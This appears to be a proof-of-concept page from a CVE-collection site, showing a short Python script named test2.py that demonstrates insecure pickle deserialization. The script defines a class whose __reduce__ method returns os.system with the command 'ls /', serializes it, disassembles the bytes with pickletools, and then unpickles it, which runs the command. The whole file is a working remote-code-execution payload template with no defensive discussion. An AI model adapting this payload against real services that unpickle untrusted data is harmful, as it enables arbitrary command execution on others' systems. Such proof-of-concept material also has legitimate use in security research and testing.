4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / test2.py PY
import os
import pickle
import pickletools

class Student():
    def __init__(self):
        self.name = 'rxz'
        self.grade = 'G2'
    def __reduce__(self):
        return (os.system, ('ls /',))

payload = pickle.dumps(Student())
payload = pickletools.optimize(payload)

print(payload)
pickletools.dis(payload)

res= pickle.loads(payload)